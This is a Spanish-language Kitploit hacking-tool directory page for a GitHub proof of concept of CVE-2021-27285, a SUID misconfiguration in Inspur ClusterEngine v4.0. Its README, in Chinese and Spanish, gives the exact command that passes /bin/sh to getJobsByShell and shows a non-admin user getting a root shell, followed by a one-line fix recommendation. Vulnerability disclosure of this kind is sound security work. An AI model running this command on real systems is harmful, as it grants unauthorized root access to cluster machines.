Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-27285 — Prueba de concepto de exploit para la configuración incorrecta de SUID en Inspur ClusterEngine (CVE-2021-27285) que permite a usuarios no administradores escalar privilegios a root a través del componente getJobsByShell. | Kitploit
Herramientas/GitHubGitHub/fjh1997/cve-2021-27285
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingExplotación de Binarios
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

Prueba de concepto de exploit para la configuración incorrecta de SUID en Inspur ClusterEngine (CVE-2021-27285) que permite a usuarios no administradores escalar privilegios a root a través del componente getJobsByShell.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-27285

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。

浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。

提权过程如下:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

修复建议: 升级相关组件

La plataforma de gestión de trabajos Inspur ClusterEngine es un software de gestión de trabajos diseñado específicamente para los productos HPC de la serie Inspur TianSuo. Una configuración incorrecta en los ajustes de SUID de Inspur ClusterEngine permite a los usuarios no administradores escalar privilegios y obtener acceso root a través de ciertos componentes.

Inspur ClusterEngine v4.0 tiene un problema de configuración incorrecta de SUID con el componente "/opt/tsce4/torque6/bin/getJobsByShell", lo que permite a los usuarios no administradores escalar privilegios y obtener acceso root a través del mecanismo SUID.

El proceso de escalada de privilegios es el siguiente:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

Recomendación: parchear los componentes relevantes.

Descargar herramienta